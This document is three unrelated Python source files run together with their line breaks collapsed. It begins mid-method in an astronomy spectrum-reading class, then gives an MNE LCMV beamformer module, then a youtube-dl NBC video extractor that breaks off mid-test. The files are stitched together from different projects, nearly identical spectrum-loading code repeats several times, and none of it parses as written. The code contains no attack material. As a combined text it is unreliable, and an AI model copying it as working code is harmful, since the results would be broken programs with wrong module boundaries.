# km/s self.trust_flag = 1 self.objid = 0 if self.milky_way_reddening : # gets the amount of MW reddening on the models self.ebv_mw = get_dust_radec(self.ra,self.dec,'ebv') else: self.ebv_mw = 0.0 print"there are", len(self.wavelength),"data points at redshift",self.redshift," between", np.min(self.wavelength[bad_data==False]), np.max(self.wavelength[bad_data==False]), "Angstrom.", np.min(self.restframe_wavelength[bad_data==False]), np.max(self.restframe_wavelength[bad_data==False]), "Angstrom in the rest frame." def openObservedStackTutorial(self): """ It reads an Stack spectrum from the LF analysis and provides the input for the firefly fitting routine. :param path_to_spectrum: :param sdss_dir: directory with the observed spectra :param milky_way_reddening: True or False if you want to correct the redenning of the Milky way. :param hpf_mode: 'on' high pass filters the data to correct from dust in the galaxy. In this aims, it stores the following data in the object : * hdu list from the spec lite * SED data : wavelength (in angstrom), flux, error on the flux (in 10^{-17} erg/cm2/s/Angstrom, like the SDSS spectra) * Metadata : * ra : in degrees J2000 * dec : in degrees J2000 * redshift : best fit * vdisp : velocity dispersion in km/s * r_instrument : resolution of the instrument at each wavelength observed * trust_flag : 1 or True if trusted * bad_flags : ones as long as the wavelength array, filters the pixels with bad data * objid : object id optional : set to 0 """ self.hdulist = pyfits.open(self.path_to_spectrum) self.ra = 0. #self.hdulist[0].header['RA'] self.dec = 0. #self.hdulist[0].header['DEC'] self.redshift = float(os.path.basename(self.path_to_spectrum).split('-')[-1].split('_')[0][1:]) self.restframe_wavelength = self.hdulist[1].data['WAVE'][0] self.wavelength = self.restframe_wavelength * (1. + self.redshift) meanWL = (self.wavelength[1:]+self.wavelength[:-1])/2. 
deltaWL = self.wavelength[1:]-self.wavelength[:-1] resolution = np.ones_like(self.wavelength)*np.mean(meanWL / deltaWL) # units of 1e-17 f lambda self.flux = self.hdulist[1].data['FLUXMEDIAN'][0]# * 1e-17 self.error = self.hdulist[1].data['FLUXMEDIAN_ERR'][0]# * 1e-17 self.bad_flags = np.ones(len(self.restframe_wavelength)) Nstacked = float(self.path_to_spectrum.split('-')[-1].split('_')[3]) lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] self.r_instrument = resolution[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.vdisp = 70. 
# km/s self.trust_flag = 1 self.objid = 0 if self.milky_way_reddening : # gets the amount of MW reddening on the models self.ebv_mw = get_dust_radec(self.ra,self.dec,'ebv') else: self.ebv_mw = 0.0 print"there are", len(self.wavelength),"data points at redshift",self.redshift," between", np.min(self.wavelength[bad_data==False]), np.max(self.wavelength[bad_data==False]), "Angstrom.", np.min(self.restframe_wavelength[bad_data==False]), np.max(self.restframe_wavelength[bad_data==False]), "Angstrom in the rest frame." def openStackEBOSS(self, redshift = 0.85, fluxKeyword='medianWeightedStack'): self.hdulist = pyfits.open(self.path_to_spectrum) self.ra = 0. #self.hdulist[0].header['RA'] self.dec = 0. #self.hdulist[0].header['DEC'] self.redshift = redshift self.restframe_wavelength = self.hdulist[1].data['wavelength'] self.wavelength = self.restframe_wavelength * (1. + self.redshift) meanWL = (self.wavelength[1:]+self.wavelength[:-1])/2. deltaWL = self.wavelength[1:]-self.wavelength[:-1] resolution = np.ones_like(self.wavelength)*np.mean(meanWL / deltaWL) self.flux = self.hdulist[1].data[fluxKeyword] #* 10**(-17) self.error = self.hdulist[1].data['jackknifStackErrors'] #* 10**(-17) self.bad_flags = np.ones(len(self.restframe_wavelength)) lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags 
= self.bad_flags[(lines_mask==False)] self.r_instrument = resolution[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.vdisp = 70. # km/s self.trust_flag = 1 self.objid = 0 if self.milky_way_reddening : # gets the amount of MW reddening on the models self.ebv_mw = get_dust_radec(self.ra,self.dec,'ebv') else: self.ebv_mw = 0.0 print"there are", len(self.wavelength),"data points at redshift",self.redshift," between", np.min(self.wavelength[bad_data==False]), np.max(self.wavelength[bad_data==False]), "Angstrom.", np.min(self.restframe_wavelength[bad_data==False]), np.max(self.restframe_wavelength[bad_data==False]), "Angstrom in the rest frame." def openObservedVVDSpectrum(self, catalog_entry, survey='vvds'): """ It reads a VVDS spectrum and provides the input for the firefly fitting routine. """ self.hdulist = pyfits.open(glob.glob(os.path.join(os.environ['VVDS_DIR'], 'spectra',"sc_*" + str(catalog_entry['NUM']) + "*atm_clean.fits"))[0]) wl=self.hdulist[0].header['CRVAL1'] + self.hdulist[0].header['CDELT1'] * np.arange(2,self.hdulist[0].header['NAXIS1']+2) fl=self.hdulist[0].data[0] correctionAperture = 1. / catalog_entry['fo'] noiseFileName=glob.glob(glob.glob(os.path.join(os.environ['VVDS_DIR'], 'spectra', "sc_*"+str(catalog_entry['NUM'])+"*noise.fits"))[0])[0] noiseHDU=pyfits.open(noiseFileName) flErr=noiseHDU[0].data[0] self.wavelength,self.flux,self.error=wl, fl*correctionAperture * 1e17, flErr*correctionAperture * 1e17 self.ra = catalog_entry['ALPHA'] self.dec = catalog_entry['DELTA'] self.bad_flags = np.ones(len(self.wavelength)) self.redshift = catalog_entry['Z'] self.vdisp = 2000. 
#catalog_entry['VDISP'] self.restframe_wavelength = self.wavelength / (1.0+self.redshift) self.trust_flag = 1 self.objid = 0 # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): self.r_instrument[wi] = 220. if self.milky_way_reddening : self.ebv_mw = catalog_entry['EBV_MW'] else: self.ebv_mw = 0.0 def openObservedVIPERSpectrum(self, catalog_entry, survey='vipers'): """ It reads a VVDS spectrum and provides the input for the firefly fitting routine. 
""" self.field='W'+catalog_entry['id_IAU'][7] specFileName=os.path.join(os.environ['VIPERS_DIR'], 'spectra',"VIPERS_"+ self.field+ "_PDR2_SPECTRA_1D",catalog_entry['id_IAU'][:6]+"_"+catalog_entry['id_IAU'][7:]+".fits") self.hdulist = pyfits.open(specFileName) wlA=self.hdulist[1].data['WAVES'] flA=self.hdulist[1].data['FLUXES'] flErrA=self.hdulist[1].data['NOISE'] mask=self.hdulist[1].data['MASK'] wl, fl, flErr= wlA[(mask==0)], flA[(mask==0)], flErrA[(mask==0)] correctionAperture = 1. / catalog_entry['fo'] self.wavelength,self.flux,self.error=wl, fl*correctionAperture * 1e17, flErr*correctionAperture * 1e17 self.ra = catalog_entry['ALPHA'] self.dec = catalog_entry['DELTA'] self.bad_flags = np.ones(len(self.wavelength)) self.redshift = catalog_entry['zspec'] self.vdisp = 2000. #catalog_entry['VDISP'] self.restframe_wavelength = self.wavelength / (1.0+self.redshift) self.trust_flag = 1 self.objid = 0 # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.r_instrument = 
np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): self.r_instrument[wi] = 220. if self.milky_way_reddening : self.ebv_mw = catalog_entry['EBV'] else: self.ebv_mw = 0.0 def openObservedDEEP2pectrum(self, catalog_entry, survey='deep2'): """ It reads a VVDS spectrum and provides the input for the firefly fitting routine. """ mask=str(catalog_entry['MASK']) objno=str(catalog_entry['OBJNO']) path_to_spectrum = glob.glob(os.path.join(os.environ['DEEP2_DIR'], 'spectra', mask, '*', '*' + objno + '*_fc_tc.dat'))[0] wl, fl, flErr= np.loadtxt(path_to_spectrum, unpack=True) self.wavelength = wl self.flux, self.error= fl * 1e17, flErr * 1e17 self.ra = catalog_entry['RA'] self.dec = catalog_entry['DEC'] self.bad_flags = np.ones(len(self.wavelength)) self.redshift = catalog_entry['ZBEST'] self.vdisp = 60. #catalog_entry['VDISP'] self.restframe_wavelength = self.wavelength / (1.0+self.redshift) self.trust_flag = 1 self.objid = 0 # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 
99999999999.9 self.bad_flags[bad_data] = 0 self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): self.r_instrument[wi] = 6000. if self.milky_way_reddening : self.ebv_mw = catalog_entry['SFD_EBV'] else: self.ebv_mw = 0.0 def openObservedMuseSpectrum(self, catalog): """Loads an observed MUSE spectrum in counts. :param catalog: name of the catalog with redshifts. """ self.wavelength, flA, flErrA = np.loadtxt(self.path_to_spectrum, unpack=True) self.flux, self.error = flA*1e-3, flErrA*1e-3 # units of 1e-17 self.bad_flags = np.ones(len(self.wavelength)) bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.redshift = catalog['FINAL_Z'] self.vdisp = 100 # catalog['VDISP'] self.restframe_wavelength = self.wavelength / (1.0+self.redshift) # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): if w<6000: self.r_instrument[wi] = (2270.0-1560.0)/(6000.0-3700.0)*w + 420.0 else: 
self.r_instrument[wi] = (2650.0-1850.0)/(9000.0-6000.0)*w + 250.0 self.trust_flag = 1 self.objid = 0 if self.milky_way_reddening : # gets the amount of MW reddening on the models self.ebv_mw = get_dust_radec(catalog['ALPHA'], catalog['DELTA'], 'ebv') else: self.ebv_mw = 0.
"""Compute Linearly constrained minimum variance (LCMV) beamformer.""" # Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Roman Goj <roman.goj@gmail.com> # Britta Westner <britta.wstnr@gmail.com> # # License: BSD-3-Clause import numpy as np from ..rank import compute_rank from ..io.meas_info import _simplify_info from ..io.pick import pick_channels_cov, pick_info from ..forward import _subject_from_forward from ..minimum_norm.inverse import combine_xyz, _check_reference, _check_depth from ..source_estimate import _make_stc, _get_src_type from ..utils import (logger, verbose, _check_channels_spatial_filter, _check_one_ch_type, _check_info_inv, warn) from ._compute_beamformer import ( _prepare_beamformer_input, _compute_power, _compute_beamformer, _check_src_type, Beamformer, _proj_whiten_data) @verbose def make_lcmv(info, forward, data_cov, reg=0.05, noise_cov=None, label=None, pick_ori=None, rank='info', weight_norm='unit-noise-gain-invariant', reduce_rank=False, depth=None, inversion='matrix', verbose=None): """Compute LCMV spatial filter. Parameters ---------- %(info_not_none)s Specifies the channels to include. Bad channels (in ``info['bads']``) are not used. forward : instance of Forward Forward operator. data_cov : instance of Covariance The data covariance. reg : float The regularization for the whitened data covariance. noise_cov : instance of Covariance The noise covariance. If provided, whitening will be done. Providing a noise covariance is mandatory if you mix sensor types, e.g. gradiometers with magnetometers or EEG with MEG. label : instance of Label Restricts the LCMV solution to a given label. %(pick_ori_bf)s - ``'vector'`` Keeps the currents for each direction separate %(rank_info)s %(weight_norm)s Defaults to ``'unit-noise-gain-invariant'``. %(reduce_rank)s %(depth)s .. versionadded:: 0.18 %(inversion_bf)s .. 
versionadded:: 0.21 %(verbose)s Returns ------- filters : instance of Beamformer Dictionary containing filter weights from LCMV beamformer. Contains the following keys: 'kind' : str The type of beamformer, in this case 'LCMV'. 'weights' : array The filter weights of the beamformer. 'data_cov' : instance of Covariance The data covariance matrix used to compute the beamformer. 'noise_cov' : instance of Covariance | None The noise covariance matrix used to compute the beamformer. 'whitener' : None | ndarray, shape (n_channels, n_channels) Whitening matrix, provided if whitening was applied to the covariance matrix and leadfield during computation of the beamformer weights. 'weight_norm' : str | None Type of weight normalization used to compute the filter weights. 'pick-ori' : None | 'max-power' | 'normal' | 'vector' The orientation in which the beamformer filters were computed. 'ch_names' : list of str Channels used to compute the beamformer. 'proj' : array Projections used to compute the beamformer. 'is_ssp' : bool If True, projections were applied prior to filter computation. 'vertices' : list Vertices for which the filter weights were computed. 'is_free_ori' : bool If True, the filter was computed with free source orientation. 'n_sources' : int Number of source location for which the filter weight were computed. 'src_type' : str Type of source space. 'source_nn' : ndarray, shape (n_sources, 3) For each source location, the surface normal. 'proj' : ndarray, shape (n_channels, n_channels) Projections used to compute the beamformer. 'subject' : str The subject ID. 'rank' : int The rank of the data covariance matrix used to compute the beamformer weights. 'max-power-ori' : ndarray, shape (n_sources, 3) | None When pick_ori='max-power', this fields contains the estimated direction of maximum power at each source location. 
'inversion' : 'single' | 'matrix' Whether the spatial filters were computed for each dipole separately or jointly for all dipoles at each vertex using a matrix inversion. Notes ----- The original reference is :footcite:`VanVeenEtAl1997`. To obtain the Sekihara unit-noise-gain vector beamformer, you should use ``weight_norm='unit-noise-gain', pick_ori='vector'`` followed by :meth:`vec_stc.project('pca', src) <mne.VectorSourceEstimate.project>`. .. versionchanged:: 0.21 The computations were extensively reworked, and the default for ``weight_norm`` was set to ``'unit-noise-gain-invariant'``. References ---------- .. footbibliography:: """ # check number of sensor types present in the data and ensure a noise cov info = _simplify_info(info) noise_cov, _, allow_mismatch = _check_one_ch_type( 'lcmv', info, forward, data_cov, noise_cov) # XXX we need this extra picking step (can't just rely on minimum norm's # because there can be a mismatch. Should probably add an extra arg to # _prepare_beamformer_input at some point (later) picks = _check_info_inv(info, forward, data_cov, noise_cov) info = pick_info(info, picks) data_rank = compute_rank(data_cov, rank=rank, info=info) noise_rank = compute_rank(noise_cov, rank=rank, info=info) for key in data_rank: if (key not in noise_rank or data_rank[key] != noise_rank[key]) and \ not allow_mismatch: raise ValueError('%s data rank (%s) did not match the noise ' 'rank (%s)' % (key, data_rank[key], noise_rank.get(key, None))) del noise_rank rank = data_rank logger.info('Making LCMV beamformer with rank %s' % (rank,)) del data_rank depth = _check_depth(depth, 'depth_sparse') if inversion == 'single': depth['combine_xyz'] = False is_free_ori, info, proj, vertno, G, whitener, nn, orient_std = \ _prepare_beamformer_input( info, forward, label, pick_ori, noise_cov=noise_cov, rank=rank, pca=False, **depth) ch_names = list(info['ch_names']) data_cov = pick_channels_cov(data_cov, include=ch_names) Cm = data_cov._get_square() if 'estimator' in 
data_cov: del data_cov['estimator'] rank_int = sum(rank.values()) del rank # compute spatial filter n_orient = 3 if is_free_ori else 1 W, max_power_ori = _compute_beamformer( G, Cm, reg, n_orient, weight_norm, pick_ori, reduce_rank, rank_int, inversion=inversion, nn=nn, orient_std=orient_std, whitener=whitener) # get src type to store with filters for _make_stc src_type = _get_src_type(forward['src'], vertno) # get subject to store with filters subject_from = _subject_from_forward(forward) # Is the computed beamformer a scalar or vector beamformer? is_free_ori = is_free_ori if pick_ori in [None, 'vector'] else False is_ssp = bool(info['projs']) filters = Beamformer( kind='LCMV', weights=W, data_cov=data_cov, noise_cov=noise_cov, whitener=whitener, weight_norm=weight_norm, pick_ori=pick_ori, ch_names=ch_names, proj=proj, is_ssp=is_ssp, vertices=vertno, is_free_ori=is_free_ori, n_sources=forward['nsource'], src_type=src_type, source_nn=forward['source_nn'].copy(), subject=subject_from, rank=rank_int, max_power_ori=max_power_ori, inversion=inversion) return filters def _apply_lcmv(data, filters, info, tmin): """Apply LCMV spatial filter to data for source reconstruction.""" if isinstance(data, np.ndarray) and data.ndim == 2: data = [data] return_single = True else: return_single = False W = filters['weights'] for i, M in enumerate(data): if len(M) != len(filters['ch_names']): raise ValueError('data and picks must have the same length') if not return_single: logger.info("Processing epoch : %d" % (i + 1)) M = _proj_whiten_data(M, info['projs'], filters) # project to source space using beamformer weights vector = False if filters['is_free_ori']: sol = np.dot(W, M) if filters['pick_ori'] == 'vector': vector = True else: logger.info('combining the current components...') sol = combine_xyz(sol) else: # Linear inverse: do computation here or delayed if (M.shape[0] < W.shape[0] and filters['pick_ori'] != 'max-power'): sol = (W, M) else: sol = np.dot(W, M) tstep = 1.0 / 
info['sfreq'] # compatibility with 0.16, add src_type as None if not present: filters, warn_text = _check_src_type(filters) yield _make_stc(sol, vertices=filters['vertices'], tmin=tmin, tstep=tstep, subject=filters['subject'], vector=vector, source_nn=filters['source_nn'], src_type=filters['src_type'], warn_text=warn_text) logger.info('[done]') def _deprecate_max_ori_out(max_ori_out): if max_ori_out is not None: warn('max_ori_out will be removed in 1.0, do not pass it as an ' 'argument', DeprecationWarning) @verbose def apply_lcmv(evoked, filters, *, max_ori_out=None, verbose=None): """Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights. Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights on evoked data. Parameters ---------- evoked : Evoked Evoked data to invert. filters : instance of Beamformer LCMV spatial filter (beamformer weights). Filter weights returned from :func:`make_lcmv`. %(max_ori_out_deprecated)s %(verbose)s Returns ------- stc : SourceEstimate | VolSourceEstimate | VectorSourceEstimate Source time courses. See Also -------- make_lcmv, apply_lcmv_raw, apply_lcmv_epochs, apply_lcmv_cov Notes ----- .. versionadded:: 0.18 """ _check_reference(evoked) _deprecate_max_ori_out(max_ori_out) info = evoked.info data = evoked.data tmin = evoked.times[0] sel = _check_channels_spatial_filter(evoked.ch_names, filters) data = data[sel] stc = _apply_lcmv(data=data, filters=filters, info=info, tmin=tmin) return next(stc) @verbose def apply_lcmv_epochs(epochs, filters, *, max_ori_out=None, return_generator=False, verbose=None): """Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights. Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights on single trial data. Parameters ---------- epochs : Epochs Single trial epochs. filters : instance of Beamformer LCMV spatial filter (beamformer weights) Filter weights returned from :func:`make_lcmv`. 
%(max_ori_out_deprecated)s return_generator : bool Return a generator object instead of a list. This allows iterating over the stcs without having to keep them all in memory. %(verbose)s Returns ------- stc: list | generator of (SourceEstimate | VolSourceEstimate) The source estimates for all epochs. See Also -------- make_lcmv, apply_lcmv_raw, apply_lcmv, apply_lcmv_cov """ _check_reference(epochs) _deprecate_max_ori_out(max_ori_out) info = epochs.info tmin = epochs.times[0] sel = _check_channels_spatial_filter(epochs.ch_names, filters) data = epochs.get_data()[:, sel, :] stcs = _apply_lcmv(data=data, filters=filters, info=info, tmin=tmin) if not return_generator: stcs = [s for s in stcs] return stcs @verbose def apply_lcmv_raw(raw, filters, start=None, stop=None, *, max_ori_out=None, verbose=None): """Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights. Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights on raw data. Parameters ---------- raw : mne.io.Raw Raw data to invert. filters : instance of Beamformer LCMV spatial filter (beamformer weights). Filter weights returned from :func:`make_lcmv`. start : int Index of first time sample (index not time is seconds). stop : int Index of first time sample not to include (index not time is seconds). %(max_ori_out_deprecated)s %(verbose)s Returns ------- stc : SourceEstimate | VolSourceEstimate Source time courses. See Also -------- make_lcmv, apply_lcmv_epochs, apply_lcmv, apply_lcmv_cov """ _check_reference(raw) _deprecate_max_ori_out(max_ori_out) info = raw.info sel = _check_channels_spatial_filter(raw.ch_names, filters) data, times = raw[sel, start:stop] tmin = times[0] stc = _apply_lcmv(data=data, filters=filters, info=info, tmin=tmin) return next(stc) @verbose def apply_lcmv_cov(data_cov, filters, verbose=None): """Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights. 
Apply Linearly Constrained Minimum Variance (LCMV) beamformer weights to a data covariance matrix to estimate source power. Parameters ---------- data_cov : instance of Covariance Data covariance matrix. filters : instance of Beamformer LCMV spatial filter (beamformer weights). Filter weights returned from :func:`make_lcmv`. %(verbose)s Returns ------- stc : SourceEstimate | VolSourceEstimate Source power. See Also -------- make_lcmv, apply_lcmv, apply_lcmv_epochs, apply_lcmv_raw """ sel = _check_channels_spatial_filter(data_cov.ch_names, filters) sel_names = [data_cov.ch_names[ii] for ii in sel] data_cov = pick_channels_cov(data_cov, sel_names) n_orient = filters['weights'].shape[0] // filters['n_sources'] # Need to project and whiten along both dimensions data = _proj_whiten_data(data_cov['data'].T, data_cov['projs'], filters) data = _proj_whiten_data(data.T, data_cov['projs'], filters) del data_cov source_power = _compute_power(data, filters['weights'], n_orient) # compatibility with 0.16, add src_type as None if not present: filters, warn_text = _check_src_type(filters) return(_make_stc(source_power, vertices=filters['vertices'], src_type=filters['src_type'], tmin=0., tstep=1., subject=filters['subject'], source_nn=filters['source_nn'], warn_text=warn_text))
# NOTE(review): this region is a youtube-dl extractor module (nbc.py) collapsed
# by a formatting-mangled paste — statements are fused onto single physical
# lines and split across them, so it will not parse as-is. Code left
# byte-identical below; restore formatting from the original project before
# making functional edits.
# NOTE(review): when restoring, the NBCNewsIE test metadata literal
# 're:^https?://.*\.jpg$' should become a raw string — '\.' in a plain string
# literal is an invalid escape sequence (DeprecationWarning on modern Python).
from __future__ import unicode_literals import re from .common import InfoExtractor from .theplatform import ThePlatformIE from ..utils import ( find_xpath_attr, lowercase_escape, smuggle_url, unescapeHTML, ) class NBCIE(InfoExtractor): _VALID_URL = r'https?://www\.nbc\.com/(?:[^/]+/)+(?P<id>n?\d+)' _TESTS = [ { 'url': 'http://www.nbc.com/the-tonight-show/segments/112966', 'info_dict': { 'id': '112966', 'ext': 'mp4', 'title': 'Jimmy Fallon Surprises Fans at Ben & Jerry\'s', 'description': 'Jimmy gives out free scoops of his new "Tonight Dough" ice cream flavor by surprising customers at the Ben & Jerry\'s scoop shop.', 'timestamp': 1424246400, 'upload_date': '20150218', 'uploader': 'NBCU-COM', }, 'params': { # m3u8 download 'skip_download': True, }, }, { 'url': 'http://www.nbc.com/the-tonight-show/episodes/176', 'info_dict': { 'id': '176', 'ext': 'flv', 'title': 'Ricky Gervais, Steven Van Zandt, ILoveMakonnen', 'description': 'A brand new episode of The Tonight Show welcomes Ricky Gervais, Steven Van Zandt and ILoveMakonnen.', }, 'skip': '404 Not Found', }, { 'url': 'http://www.nbc.com/saturday-night-live/video/star-wars-teaser/2832821', 'info_dict': { 'id': '2832821', 'ext': 'mp4', 'title': 'Star Wars Teaser', 'description': 'md5:0b40f9cbde5b671a7ff62fceccc4f442', 'timestamp': 1417852800, 'upload_date': '20141206', 'uploader': 'NBCU-COM', }, 'params': { # m3u8 download 'skip_download': True, }, 'skip': 'Only works from US', }, { # This video has expired but with an escaped embedURL 'url': 'http://www.nbc.com/parenthood/episode-guide/season-5/just-like-at-home/515', 'only_matching': True, }, { # HLS streams requires the 'hdnea3' cookie 'url': 'http://www.nbc.com/Kings/video/goliath/n1806', 'info_dict': { 'id': 'n1806', 'ext': 'mp4', 'title': 'Goliath', 'description': 'When an unknown soldier saves the life of the King\'s son in battle, he\'s thrust into the limelight and politics of the kingdom.', 'timestamp': 1237100400, 'upload_date': '20090315', 'uploader':
'NBCU-COM', }, 'params': { 'skip_download': True, }, 'skip': 'Only works from US', } ] def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) theplatform_url = unescapeHTML(lowercase_escape(self._html_search_regex( [ r'(?:class="video-player video-player-full" data-mpx-url|class="player" src)="(.*?)"', r'<iframe[^>]+src="((?:https?:)?//player\.theplatform\.com/[^"]+)"', r'"embedURL"\s*:\s*"([^"]+)"' ], webpage, 'theplatform url').replace('_no_endcard', '').replace('\\/', '/'))) if theplatform_url.startswith('//'): theplatform_url = 'http:' + theplatform_url return { '_type': 'url_transparent', 'ie_key': 'ThePlatform', 'url': smuggle_url(theplatform_url, {'source_url': url}), 'id': video_id, } class NBCSportsVPlayerIE(InfoExtractor): _VALID_URL = r'https?://vplayer\.nbcsports\.com/(?:[^/]+/)+(?P<id>[0-9a-zA-Z_]+)' _TESTS = [{ 'url': 'https://vplayer.nbcsports.com/p/BxmELC/nbcsports_share/select/9CsDKds0kvHI', 'info_dict': { 'id': '9CsDKds0kvHI', 'ext': 'flv', 'description': 'md5:df390f70a9ba7c95ff1daace988f0d8d', 'title': 'Tyler Kalinoski hits buzzer-beater to lift Davidson', 'timestamp': 1426270238, 'upload_date': '20150313', 'uploader': 'NBCU-SPORTS', } }, { 'url': 'http://vplayer.nbcsports.com/p/BxmELC/nbc_embedshare/select/_hqLjQ95yx8Z', 'only_matching': True, }] @staticmethod def _extract_url(webpage): iframe_m = re.search( r'<iframe[^>]+src="(?P<url>https?://vplayer\.nbcsports\.com/[^"]+)"', webpage) if iframe_m: return iframe_m.group('url') def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) theplatform_url = self._og_search_video_url(webpage) return self.url_result(theplatform_url, 'ThePlatform') class NBCSportsIE(InfoExtractor): # Does not include https because its certificate is invalid _VALID_URL = r'https?://www\.nbcsports\.com//?(?:[^/]+/)+(?P<id>[0-9a-z-]+)' _TEST = { 'url':
